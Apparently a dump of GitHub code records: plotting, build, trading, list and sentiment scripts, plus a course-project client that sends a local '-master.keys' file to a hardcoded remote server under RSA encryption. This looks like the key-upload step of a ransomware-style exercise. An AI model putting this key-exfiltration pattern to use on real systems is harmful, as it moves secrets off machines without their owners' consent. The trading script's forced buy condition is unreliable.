cell.phi_idx =0 \n cell.vertices[0] = [0,y_low,x_min_low]\n cell.vertices[1] = [0,y_low,x_max_low]\n #cell.vertices[2] = [0,y_high_border[iCell - 1],x_high_max_border[iCell - 1]]\n cell.vertices[2] = [0,y_high_border[iCell],x_high_min_border[iCell]]\n cell.vertices[3] = [0,y_high_border[iCell],x_high_max_border[iCell]]\n cell.vertices[4] = cell.vertices[0]\n cell.vertices[5] = cell.vertices[1]\n cell.vertices[6] = cell.vertices[2]\n cell.vertices[7] = cell.vertices[3]\n cell.dphi = -1\n cell = Update(cell)\n\n for slice in range(cell.granularity[cell.layer]):\n #if slice > 0: continue HACK!\n rotated_cell = cell.RotatePhi()\n rotated_cell_df_i = pd.DataFrame(rotated_cell.vertices_dict)\n if(len(cell_df)==0):\n cell_df = rotated_cell_df_i\n else:\n cell_df = pd.concat([cell_df,rotated_cell_df_i])\n cell_df = pd.concat([cell_df,pd.DataFrame(rotated_cell.MirrorZ().vertices_dict)])\n cell = rotated_cell\n\n\n\n plt.plot( [ x_min_low, x_max_low ], [ y_low, y_low ], c = color, lw = linewidth )\n if ( iCell % layer_mergeFactors[iLayer] == 0 ) and iCell > 0:\n plt.plot( [ x_min_low, x_high_max_border[ iCell - 1 ] ], [ y_low, y_high_border[iCell - 1] ], c = color, lw = linewidth )\n elif iCell > 0:\n# plt.plot( [ x_min_low, x_min_low + dx_min ], [ y_low, y_low + dy ], c = \"k\", lw = linewidth )\n plt.plot( [ x_high_max_border[iCell - 1], x_high_min_border[iCell] ], [ y_high_border[iCell - 1], y_high_border[iCell] ], c = color, lw = linewidth )\n plt.plot( [ x_min_low, x_low_max_border[iCell - 1] ], [ y_low, y_low_border[iCell - 1] ], c = color, lw = linewidth )\n if iCell == nBins_barrel - 1:\n plt.plot( [x_max_low, x_max_low + dx_max], [y_low, y_low + dy], c = color, lw = linewidth )\n \n# plt.plot( [ x_max_low, x_max_low + dx_max ], [ y_low, y_low + dy ], c = color, lw = linewidth )\n plt.plot( [ x_min_low + dx_min, x_max_low + dx_max ], [ y_low + dy, y_low + dy ], c = color, lw = linewidth )\n\n#\n# ID\n#\n\n### dump cell vertices on plot\nfor v in [2,3]:\n plot_df = cell_df[ (cell_df['phi_idx']==1) & (cell_df['region']>0) ]\n plt.scatter(plot_df[f'v{v}z'],plot_df[f'v{v}y'])\n\n### Write cells dataframe\ncell_df['idx'] = range(len(cell_df))\nprint(cell_df)\ncell_df.to_pickle(\"cells.pkl\")\n\n\nd_x = 0.01\n\nax = plt.gca()\n\nr_pixel = [ 39, 75, 155, 213, 271 ]\ndz_pixel = 280\n\nr_strips = [ 405, 562, 762, 1000 ]\ndz_strips = 1150\n\nz_pixel_ec = [ 350, 420, 530, 670, 870, 1100, 1400, 2000, 2300, 2650 ]\nz_strips_ec = [ 1300, 1600, 1900, 2250, 2650 ]\n\nplt.grid(True)\n\nfor i_r, r in enumerate( r_pixel ):\n label = None\n if i_r == 0:\n label = \"Tracker\"\n plt.plot( [0.0, dz_pixel], [r, r], color = colors[9], label = label, lw = linewidth )\n\nfor i_r, r in enumerate( r_strips ):\n plt.plot( [0.0, dz_strips], [r, r], color = colors[9], lw = linewidth )\n\nfor z in z_pixel_ec[:7]:\n plt.plot( [ z, z ], [ 39, 271 ], color = colors[9], lw = linewidth )\n \nfor z in z_pixel_ec[7:]:\n plt.plot( [ z, z ], [ 155, 271], color = colors[9], lw = linewidth )\n\nfor z in z_strips_ec:\n plt.plot( [z, z], [405, 1000], color = colors[9], lw = linewidth )\n\nr_iron = [ 1166.4433333333333, 1332.8866666666666 ]\ndz_iron = [ 2527.27, 2839.51 ]\n\nlabel = \"Iron\"\nfor r, dz in zip( r_iron, dz_iron ):\n plt.plot( [ 0.0, dz ], [ r, r ], color = colors[8], lw = linewidth, label = label )\n label = None\n\nplt.plot( [ 2839.51, 2839.51 ], [ 292.797, 1332.8866666666666 ], color = colors[8], lw = linewidth, label = label )\n \nplt.xlim( 0.0, 6e3 )\nplt.ylim( 0.0, 6e3 )\n\nplt.xlabel('z [mm]')\nplt.ylabel('y [mm]')\nplt.gca().set_axisbelow(True)\nplt.legend()\nplt.gca().legend( fancybox = 'round', frameon = True, loc = \"upper right\", fontsize = 5.5 )\nplt.tight_layout()\n\nplt.show()\n\n\n","repo_name":"cocoa-hep/cocoa-hep","sub_path":"COCOA/phoenix/event/dump_cell_vertex_lookup.py","file_name":"dump_cell_vertex_lookup.py","file_ext":"py","file_size_in_byte":12666,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"6056714065","text":"JAVA_DOCS = \"-link https://docs.oracle.com/en/java/javase/11/docs/api/\"\n\ndef _impl(ctx):\n dir = ctx.label.name\n outjar = ctx.outputs.jar\n\n dep_list = []\n for dep in ctx.files.deps:\n dep_list += [dep.path]\n\n src_list = []\n for src in ctx.files.srcs:\n src_list += [src.path]\n\n java_runtime = ctx.attr._jdk[java_common.JavaRuntimeInfo]\n jar_exe_path = \"%s/bin/jar\" % java_runtime.java_home\n\n cmd = [\n \"mkdir %s\" % dir,\n \"javadoc -encoding UTF-8 -quiet -tag onos.rsModel:a:\\\"onos model\\\" %s -d %s -cp %s %s\" %\n (JAVA_DOCS, dir, \":\".join(dep_list), \" \".join(src_list)),\n \"%s cf %s -C %s .\" % (jar_exe_path, outjar.path, dir),\n ]\n\n ctx.actions.run_shell(\n inputs = ctx.files.srcs + ctx.files.deps,\n outputs = [outjar],\n progress_message = \"Generating javadocs jar for %s\" % ctx.attr.name,\n command = \";\\n\".join(cmd),\n tools = java_runtime.files,\n )\n\njavadoc = rule(\n attrs = {\n \"deps\": attr.label_list(allow_files = True),\n \"srcs\": attr.label_list(allow_files = True),\n \"_jdk\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n providers = [java_common.JavaRuntimeInfo],\n ),\n },\n implementation = _impl,\n outputs = {\"jar\": \"%{name}.jar\"},\n)\n","repo_name":"opennetworkinglab/onos","sub_path":"tools/build/bazel/javadoc.bzl","file_name":"javadoc.bzl","file_ext":"bzl","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1121,"dataset":"github-code","pt":"61"} +{"seq_id":"24157062324","text":"from .base import StrategyParameter, BaseStrategy\n\n\nf_delta = lambda x, y: (x / y - 1) * 100\n\n\nclass Strategy(BaseStrategy):\n\n VERBOSE_NAME = \"Персечение двух SMA\"\n WINDOW_LENGTH = 30\n TIMEFRAME = \"1m\"\n MA1 = StrategyParameter(\"Период MA1\", \"int\", 10)\n MA2 = StrategyParameter(\"Период MA2\", \"int\", 27)\n BALANCE = StrategyParameter(\"Баланс для торговли\", \"int\", 5)\n\n def __init__(self, strat_params):\n self.state = None\n self.strat_params = strat_params\n self.INDICATORS = {\n \"sma1\": (\"sma\", self.strat_params[\"MA1\"]),\n \"sma1_prev\": (\"sma\", self.strat_params[\"MA1\"], 1),\n \"sma2\": (\"sma\", self.strat_params[\"MA2\"]),\n \"sma2_prev\": (\"sma\", self.strat_params[\"MA2\"], 1)\n }\n\n def handle_data_candle(self, api, data, indi):\n last_candle = data[\"candles\"][-1]\n delta = (f_delta(indi.get(\"sma1_prev\"), indi.get(\"sma2_prev\")), f_delta(indi.get(\"sma1\"), indi.get(\"sma2\")))\n buy_cond = [\n last_candle[4] < indi.get(\"sma1\"),\n delta[-1] > delta[-2],\n delta[-1] < -0.1,\n last_candle[3] < indi.get(\"sma1\") < last_candle[2],\n ]\n sell_cond = [\n last_candle[4] > indi.get(\"sma1\"),\n delta[-1] < delta[-2],\n delta[-1] > -0.1,\n last_candle[3] < indi.get(\"sma1\") < last_candle[2],\n ]\n print(f\"{self.state} buy : {buy_cond} sell: {sell_cond}\")\n if self.state is None:\n if all(buy_cond) or True:\n api.create_market_order(data[\"symbol\"], \"buy\", self.strat_params[\"BALANCE\"])\n self.state = \"long\"\n elif all(sell_cond):\n api.create_market_order(data[\"symbol\"], \"sell\", self.strat_params[\"BALANCE\"])\n self.state = \"short\"\n elif self.state == \"long\":\n if all(sell_cond) or (delta[-1] - delta[-2] > 0.18 and delta[-1] > 0):\n api.create_market_order(data[\"symbol\"], \"sell\", 2*self.strat_params[\"BALANCE\"])\n self.state = \"short\"\n elif self.state == \"short\":\n if all(sell_cond) or (delta[-1] - delta[-2] < -0.18 and delta[-1] < 0):\n api.create_market_order(data[\"symbol\"], \"buy\", 2*self.strat_params[\"BALANCE\"])\n self.state = \"long\"\n\n\n def handle_data_tick(self, api, data, indicators):\n pass#print(\"tick\")\n","repo_name":"shebetov/diaper","sub_path":"strategies/strat1.py","file_name":"strat1.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4029226102","text":"from tda_lista_lista import Lista, insertar, eliminar, busqueda, barrido, barrido_con_sublista, tamanio, lista_vacia\r\nfrom random import randint\r\n\r\ndef eliminar_anteultimo(lista,clave):\r\n cont = 0\r\n aux = lista.inicio\r\n c1 = str(clave)\r\n tam = tamanio(lista)-1\r\n while (aux is not None):\r\n n = str(aux.info.nombre)\r\n if (cont == tam-1):\r\n eliminar(lista,n,c1)\r\n cont += 1\r\n aux = aux.sig\r\n \r\n\r\nclass Personaje(object):\r\n \r\n def __init__(self,nombre,altura,edad,genero,especie,planetaNatal,episodioAparece):\r\n self.altura = altura\r\n self.nombre = nombre\r\n self.edad = edad\r\n self.genero = genero\r\n self.especie = especie\r\n self.planetaNatal = planetaNatal\r\n self.episodioAparece = episodioAparece\r\n \r\n def __str__(self):\r\n ret = \"\"\r\n for e in self.episodioAparece:\r\n ret += e\r\n return self.nombre +\" \"+ self.altura +\" \"+ self.edad +\" \"+ self.genero +\" \"+ self.especie +\" \"+ self.planetaNatal+\" \"+ret\r\n\r\nstarWars = Lista()\r\npersonaje1 = Personaje(\"Artud\",\"60\",\"801\",\"masculino\",\"Droide\",\"Industria Autonoma\",[\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = Personaje(\"Darth Vader\",\"180\",\"845\",\"masculino\",\"humano\",\"Tatooine\",[\"4\",\"5\",\"6\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = Personaje(\"Han Solo\",\"160\",\"800\",\"masculino\",\"humano\",\"Corelia\",[\"2\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = Personaje(\"Leia\",\"150\",\"815\",\"femenino\",\"humano\",\"Alderaan\",[\"1\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\nbarrido(starWars)\r\n'''\r\nnombre = input(\"Nombre del personaje: \")\r\nwhile (nombre != \"\"):\r\n altura = input(\"Ingrese altura: \")\r\n edad = input(\"Ingrese edad: \")\r\n genero = input(\"Ingrese genero (femenino, masculino, robot: \")\r\n especie = input(\"Ingrese Especie: \")\r\n planetaNatal = input(\"Ingrese planeta natal: \")\r\n #episodios = int(input(\"En cuantos episodios aparece: \"))\r\n #for e in range(episodios):\r\n # episodio = input(\"Numero del episodio: \")\r\n # episodioAparece += episodio\r\n episodioAparece = []\r\n episodio = input(\"Episodio donde aparece: \")\r\n while (episodio != \"\"):\r\n episodioAparece += episodio\r\n episodio = input(\"Ingrese otro episodio donde aparece: \")\r\n personaje = Personaje(nombre,altura,edad,genero,especie,planetaNatal,episodioAparece)\r\n insertar(starWars,personaje,\"nombre\")\r\n nombre = input(\"Ingrese un personaje: \")\r\nbarrido(starWars) \r\n'''\r\nprint(\"\")\r\n\r\naux = starWars.inicio\r\nmayor = aux\r\nwhile (aux is not None):\r\n if (aux.info.genero == \"femenino\"):\r\n print(\"Personaje feminino\") \r\n print(aux.info.nombre)\r\n control = False\r\n if (aux.info.especie == \"Droide\"):\r\n for e in aux.info.episodioAparece:\r\n if (int(e) < 7):\r\n control = True\r\n if (control == True):\r\n print(\"Droide encontrado en los primeros 6 episodios: \")\r\n print(aux.info)\r\n if (aux.info.nombre == \"Darth Vader\"):\r\n print(\"Vader esta en la lista : \")\r\n print(aux.info)\r\n if (aux.info.nombre == \"Han Solo\"):\r\n print(\"Informacion de Han Solo: \")\r\n print(aux.info)\r\n control2 = False\r\n for e in aux.info.episodioAparece:\r\n if (int(e)<=7):\r\n control2 = True\r\n if (control2 == True):\r\n print(\"Peronsaje que aprece en alguno de los primeros 7 episodios: \")\r\n print(aux.info)\r\n if (int(aux.info.edad) > 800):\r\n print(\"Personaje con mas de 800 anios.\",aux.info.nombre)\r\n if (int(aux.info.edad) > 800 and int(aux.info.edad) > int(mayor.info.edad)):\r\n mayor = aux\r\n if (aux.info.especie == \"humano\" and aux.info.planetaNatal == \"Alderaan\"):\r\n print(\"Humano nacido en Alderan \",aux.info.nombre)\r\n if (int(aux.info.altura) < 70):\r\n print(aux.info.nombre, \" su altura es menor de 70.\")\r\n# for e in aux.info.episodioAparece:\r\n# if (int(e) == 7 or int(e) == 5 or int(e) == 4):\r\n# nom = aux.info.nombre\r\n# eliminar(starWars,nom,\"nombre\")\r\n aux = aux.sig\r\n \r\nprint(\" \") \r\nbarrido(starWars)\r\nprint(\"MARCA\",mayor.info)\r\nprint(\" \")\r\nchu = []\r\nep = input(\"Chew aparece en el episodio: \")\r\nwhile (ep != \"\"):\r\n chu += ep\r\n ep = str(input(\"Chewy aparece en el episodio: \"))\r\n\r\npersonaje1 = Personaje(\"Chewbacca\",\"230\",\"101\",\"masculino\",\"Wookiee\",\"Kashyyyk\",chu)\r\ninsertar(starWars,personaje1,\"nombre\")\r\nbarrido(starWars)\r\nprint(\"Datos de chewbacca : \",busqueda(starWars,\"Chewbacca\",\"nombre\").info)\r\n\r\neliminar_anteultimo(starWars,\"nombre\")\r\nprint(\" \")\r\nbarrido((starWars))","repo_name":"JuanInhale/Algoritmos-2020","sub_path":"tp4 ej11.py","file_name":"tp4 ej11.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11829763418","text":"from joblib import Parallel, delayed\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\n\n\nplt.rcParams[\"figure.figsize\"] = (15,15)\n\ndef compute_alerts_and_performance(df, taus=np.linspace(0,1,25), return_oc_res=False, tau_on_percentile=False):\n \"\"\"\n From a dataframe of model risk estimates returns the observer level alerts and performance of various decision thresholds (taus).\n \n ***\n\n Parameters\n ----------\n df : pandas.DataFrame\n Given dataframe of risk estimates must have the following columns: ***\n \n taus: np.array, optional\n The decision thresholds being considered\n \n return_oc_res: Boolean, optional\n If the observed alert counts should be returns\n \n tau_on_percentile: Boolean, optional\n If the taus are evaluated on the percentiles of the risk estimates\n\n Returns\n -------\n ap_res : returns summaries of the observer level number of alerts and performance for each tau\n \n oc_res : returns the actual number of alerts obvserved by each observer for a given tau\n \"\"\"\n #calculate sensitivity at the population level\n #calculate alerts at the observer level\n\n observers = df['observer'].unique()\n\n res = []\n oc_res = []\n for tau in taus:\n _df = df.copy()\n if tau_on_percentile:\n _df['p'] = _df['p'].rank(pct=True)\n _df['y_hat'] = 1*(_df['p']>=tau)\n\n\n\n #population performance (confusion matrix (cm))\n _ = _df.groupby('eID').max()\n cm = {}\n tn, fp, fn, tp = metrics.confusion_matrix(_['y'], _['y_hat']).ravel()\n cm['tn'] = tn\n cm['fp'] = fp\n cm['fn'] = fn\n cm['tp'] = tp\n\n #observer alerts\n _ = _df[_df['y_hat']==1].groupby('eID').first()\n alert_counts = _['observer'].value_counts()\n oc = alert_counts.to_dict()\n oc_v = oc.values()\n oa = {'oa_max': alert_counts.max(), 'oa_min': alert_counts.min(), \n 'oa_mean': alert_counts.mean(), 'oa_med': alert_counts.median(),\n 'oa_sum': alert_counts.sum(), \n }\n\n _oc_res = [{'observer': o, 'tau': tau, 'n_alerts': oc.get(o, 0)} for o in observers]\n oc_res+=_oc_res\n\n #save tau res\n _res = {'tau': tau}\n _res.update(cm)\n _res.update(oa)\n res.append(_res)\n\n\n ap_res = pd.DataFrame(res)\n #calculate performance based on cm\n ap_res['sens'] = ap_res['tp'] / (ap_res['tp'] + ap_res['fn'])\n ap_res['spec'] = ap_res['tn'] / (ap_res['tn'] + ap_res['fp'])\n ap_res['ppv'] = ap_res['tp'] / (ap_res['tp'] + ap_res['fp'])\n ap_res['npv'] = ap_res['tn'] / (ap_res['tn'] + ap_res['fn'])\n\n ne = _df['eID'].nunique()\n ap_res['proportion_unalerted'] = (ne-ap_res['oa_sum'])/ne\n\n oc_res = pd.DataFrame(oc_res)\n \n if return_oc_res:\n return(ap_res, oc_res)\n else:\n return(ap_res)\n\n\ndef plot_alerts_and_performance(ap_res, performance_measures=['sens', 'spec']):\n fig, ax1 = plt.subplots()\n\n ax2 = ax1.twinx()\n for m in performance_measures:\n ax1.plot(ap_res['tau'], ap_res[m], label=m)\n\n\n ax2.plot(ap_res['tau'], ap_res['oa_med'], ':', color='r', label='# alerts per unit')\n ax2.fill_between(ap_res['tau'], ap_res['oa_max'], ap_res['oa_min'], color='r', alpha=0.5,)\n\n ax1.set_xlabel('Tau')\n ax1.set_ylabel('Performance')\n ax2.set_ylabel('# Observed Alerts ')\n\n ax1.legend(loc='lower left')\n ax2.legend(loc='upper right')\n\n plt.show()\n \n \n \n \n \ndef plot_trade_off(ap_res,\n alpha=np.expand_dims(np.linspace(1,0, 25), axis=1),\n cmap = plt.cm.get_cmap('viridis'),\n c1 = 'sens' , c2='proportion_unalerted' ):\n v1 = np.expand_dims(ap_res[c1].values, axis=0)\n v2 = np.expand_dims(ap_res[c2].values, axis=0)\n v = alpha*v1 + (1-alpha)*v2\n \n taus = list(ap_res['tau'])\n extent = [taus[0], taus[-1], alpha[-1,0], alpha[0,0]]\n\n plt.imshow(v, extent=extent, cmap=cmap, vmin=0, vmax=1)\n plt.colorbar()\n plt.xlabel('tau')\n plt.ylabel('alpha\\nupweight {} {} upweight {}'.format(c2, ' '*40, c1))\n plt.title('alpha*{} + (1-alpha)*{}\\nin w.r.t alpha & tau'.format(c1, c2))\n plt.show()\n \n #new\n _X,_Y = np.meshgrid(taus, alpha)\n\n fig, ax = plt.subplots()\n CS = ax.contour(_X, _Y, v)\n ax.clabel(CS, CS.levels, inline=True, fontsize=10)\n fig.colorbar(CS)\n ax.set_xlabel('tau')\n ax.set_ylabel('alpha*{} + (1-alpha)*{}\\nin w.r.t alpha & tau'.format(c1, c2))\n plt.show()\n\n \ndef plot_gain(ap_res,\n alpha=np.expand_dims(np.linspace(0.1,0.3, 5), axis=1), \n kappa = 10000,\n beta = 20):\n \n #alpha: effectiveness\n #kappa: cost of CDI\n #beta: intervention cost\n \n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n v = alpha*kappa*n_intervene_pos - beta*n_intervene\n\n for i,_a in enumerate(alpha):\n plt.plot(list(ap_res['tau']), v[i], label='alpha={}'.format(_a[0]))\n\n plt.xlabel('tau')\n plt.ylabel('Gain')\n plt.legend()\n plt.show()\n \n \ndef plot_effectiveness(ap_res, e = np.expand_dims(np.linspace(0,1, 5), axis=1)):\n #e: effectiveness\n \n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n n_pos = np.expand_dims((ap_res['tp'] + ap_res['fn']).values, axis=0)\n \n v = n_pos - (e*n_intervene_pos)\n \n for i,_e in enumerate(e):\n plt.plot(n_intervene[0], v[i], label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n \n for i,_e in enumerate(e):\n plt.plot(list(ap_res['tau']), v[i], label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n \n return v\n\n\n\n######### Bootstrapped Versions ###########\ndef bs_sample(df):\n\n rng = np.random.default_rng()\n IDs = df['eID'].unique()\n _IDs = rng.choice(IDs, size=len(IDs), replace=True)\n _df = []\n for i, _ID in enumerate(_IDs):\n _df_ID = df[df['eID']==_ID].copy(deep=True)\n _df_ID['eID'] = str(i) + '_' + _df_ID['eID'].astype(str)\n _df.append(_df_ID)\n _df = pd.concat(_df)\n \n return(_df)\n\n\n\ndef _bs_rep_compute_alerts_and_performance(df, tau_on_percentile=True):\n bs_df = bs_sample(df)\n bs_ap_res, bs_oc_res = compute_alerts_and_performance(bs_df, return_oc_res=True, tau_on_percentile=tau_on_percentile)\n return(bs_ap_res, bs_oc_res)\n \n \n\ndef bs_compute_alerts_and_performance(df, tau_on_percentile=True, bs_rep=10, n_jobs=5):\n ap_res, oc_res = compute_alerts_and_performance(df, return_oc_res=True, tau_on_percentile=tau_on_percentile)\n \n bs_res = Parallel(n_jobs=n_jobs)(delayed(_bs_rep_compute_alerts_and_performance)(df) for _ in range(bs_rep))\n \n bs_ap_res = []\n bs_oc_res = []\n for i, _bs_res in enumerate(bs_res):\n _bs_res[0]['rep'] = i\n bs_ap_res.append(_bs_res[0])\n _bs_res[1]['rep'] = i\n bs_oc_res.append(_bs_res[1])\n\n bs_ap_res = pd.concat(bs_ap_res)\n bs_oc_res = pd.concat(bs_oc_res)\n \n return(ap_res, oc_res, bs_ap_res, bs_oc_res)\n\n\n\ndef bs_plot_effectiveness(ap_res, bs_ap_res, \n e = np.expand_dims(np.linspace(0,1, 5), axis=1)):\n #e: effectiveness\n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n n_pos = np.expand_dims((ap_res['tp'] + ap_res['fn']).values, axis=0)\n\n v = n_pos - (e*n_intervene_pos)\n\n\n _bs_ap_res = bs_ap_res.copy(deep=True)\n _bs_ap_res['n_intervene'] = _bs_ap_res['tp']+bs_ap_res['fp']\n _bs_ap_res['n_intervene_pos'] = _bs_ap_res['tp']\n _bs_ap_res['n_pos'] = _bs_ap_res['tp'] + _bs_ap_res['fn']\n\n\n for i,_e in enumerate(e):\n #plt.plot(n_intervene[0], v[i], label='effectiveness={}'.format(_e[0]))\n\n x = n_intervene[0]\n y = v[i]\n\n _bs_ap_res['v'] = _bs_ap_res['n_pos'] - _e*_bs_ap_res['n_intervene_pos']\n _ = _bs_ap_res.groupby(by=['tau'])[['n_intervene', 'v']].describe(percentiles=[0.025, 0.25, 0.5, 0.75, 0.975])\n x_lb = _[('n_intervene', '2.5%')]\n x_ub = _[('n_intervene', '97.5%')]\n xerr = [x-x_lb, x_ub-x]\n\n y_lb = _[('v', '2.5%')]\n y_ub = _[('v', '97.5%')]\n yerr = [y-y_lb, y_ub-y]\n\n plt.errorbar(x, y, xerr=xerr, yerr=yerr, \n label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n\n for i,_e in enumerate(e):\n #plt.plot(list(ap_res['tau']), v[i], label='effectiveness={}'.format(_e[0]))\n \n x = list(ap_res['tau'])\n y = v[i]\n\n _bs_ap_res['v'] = _bs_ap_res['n_pos'] - _e*_bs_ap_res['n_intervene_pos']\n _ = _bs_ap_res.groupby(by=['tau'])[['n_intervene', 'v']].describe(percentiles=[0.025, 0.25, 0.5, 0.75, 0.975])\n\n y_lb = _[('v', '2.5%')]\n y_ub = _[('v', '97.5%')]\n yerr = [y-y_lb, y_ub-y]\n\n plt.errorbar(x, y, yerr=yerr, \n label='effectiveness={}'.format(_e[0]))\n \n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n\n\n\n\n\n\n","repo_name":"eotles/model_alerting_and_performance_evaluation","sub_path":"model_alerting_and_performance_evaluation.py","file_name":"model_alerting_and_performance_evaluation.py","file_ext":"py","file_size_in_byte":9446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71494388995","text":"import socket\nimport pickle\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives.serialization import Encoding, PublicFormat\n\nHOST = \"172.174.106.14\"\nPORT = 10100\n\ndef __init_connection() -> rsa.RSAPublicKey:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.send(b\"INIT\")\n public_key = pickle.loads(s.recv(2048))\n\n return public_key\n \n\ndef __send_filename(filename: str) -> None:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n try:\n s.connect((HOST, PORT))\n s.send(b\"FNAM\")\n ack = s.recv(4)\n if ack == b\"ACK\":\n s.send(filename.encode())\n except:\n return\n \n\ndef __send_file(filename: str, public_key: rsa.RSAPublicKey) -> None:\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n with open(filename, 'rb') as file:\n for line in file:\n ciphertext = public_key.encrypt(\n line,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n s.send(pickle.dumps(ciphertext))\n while True:\n ack = s.recv(4)\n if ack == b\"ACK\":\n break\n s.send(b\"END\")\n except Exception as e:\n print(e)\n\n\ndef __send_master_key(filename: str, public_key: rsa.RSAPublicKey) -> None:\n file = f\"{filename}-master.keys\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.send(b\"MKEY\")\n ack = s.recv(4)\n if ack == b\"ACK\":\n __send_file(file, public_key)\n\n\ndef send_master_key(filename: str) -> None:\n public_key = __init_connection()\n\n __send_filename(filename)\n\n __send_master_key(filename, public_key)","repo_name":"vadrif-draco/CSE451-CompAndNetSec-Project","sub_path":"client_server_comm/client_server.py","file_name":"client_server.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30240790667","text":"import renszarvas\n\nlista=[]\n\ndef beolvas():\n #fájl elérése\n beFajlom=open(\"fileok/Mikulasszan.txt\",\"r\",encoding=\"utf-8\")\n #első sor eldobása\n beFajlom.readline()\n #többi sor\n adatok=beFajlom.readlines()\n #print(adatok)\n #beolvasott sorok feldolgozása\n for sor in adatok:\n #sorvégejelektől megtisztítom\n sor=sor.strip()\n #eldarabolom\n darabolt=sor.split(\"@\")\n #print(darabolt)\n #példányosítás\n szarvas=renszarvas.Renszarvaas(darabolt[0],darabolt[1],darabolt[2],darabolt[3])\n #print(szarvas)\n #listába fűzöm az objektumokat.\n lista.append(szarvas)\n\ndef kiir():\n #utasok kiírása\n for szarvas in lista:\n print(szarvas)\n\n\ndef mikulas():\n print(\n\"\"\"\n\\tA feladathoz az adatokat a Mikulassszan.txt állományban találod. Ez egy rövid nyilvántartás, arról, hogy ki utazik a szánon.\n\\t1.\tOlvasd be a mikulás rénszarvasainak adatait! \n\\ta.\tÍrd ki a nevüket és a magasságukat.\n\\tb.\tHány rénszarvasa van a mikulásnak?\n c.\tÍrd ki Pompás idegen nyelvű megfelelőjét!\n d.\tA rénszarvas leírásokban hányszor fordul elő a Mikulás szó?\n e.\tÁtlagosa milyen magasak a rénszarvasok?\n f.\tÍrd ki a páros helyen repülő szarvasok magyar nevét!\n g.\tHányadik rénszarvasnak a leghosszabb a kiírása? (Kinek a leírása áll a legtöbb karakterből?)\n h.\tKi repül a legkisebb sorszámú helyen?\n\n \"\"\"\n )\n\n #szarvas1=renszarvas.Renszarvaas(\"Comet – Üstökös\",\"140\",\"2\",\"A Blorouis üstökös után kapta a nevét. Abban az időben ez vezette a csapatot a sötét és ködös éjszakán. Már az iskolában is kitűnő tanuló volt, a Mikulás igazi támaszának számított. Néha nagyon makacs, de erős. Különleges vezetői képességekkel rendelkezik, mindig a problémára összpontosít.\")\n #print(szarvas1)\n beolvas()\n kiir()","repo_name":"Laci202/urlap","sub_path":"0110OraiMunka/feladat7.py","file_name":"feladat7.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70990300994","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 1 13:41:53 2021\n\n@author: shashwat\n\"\"\"\n\n\nimport streamlit as st\nimport nltk \nimport numpy as np\nfrom textblob import TextBlob\nimport os \nimport matplotlib.pyplot as plt\nimport re\nfrom nltk.classify import SklearnClassifier\nfrom nltk.classify import ClassifierI\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport pandas as pd\nimport pickle\nimport tweepy\nimport plotly.express as px\nimport wordcloud\nfrom wordcloud import STOPWORDS\nfrom wordcloud import WordCloud\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\n\ndef cleanTxt(text):\n text = re.sub('@[A-Za-z0–9]+', '', text) \n text = re.sub('#', '', text) \n text = re.sub('RT[\\s]+', '', text)\n text = re.sub('https?:\\/\\/\\S+', '', text) \n return text\n\n\ndef tw_sentiment(tweet):\n with open('naivebayes.pickle', 'rb') as f:\n clf = pickle.load(f)\n tweet_features = find_features(tweet)\n d = clf.prob_classify(tweet_features)\n if d.prob(\"neg\") > 0.9:\n return \"neg \"\n elif d.prob(\"pos\") > 0.6:\n return \"pos\"\n return \"neutral\" \n\n\ndef find_features(document):\n all_words = np.load(\"allwords.npy\")\n words = 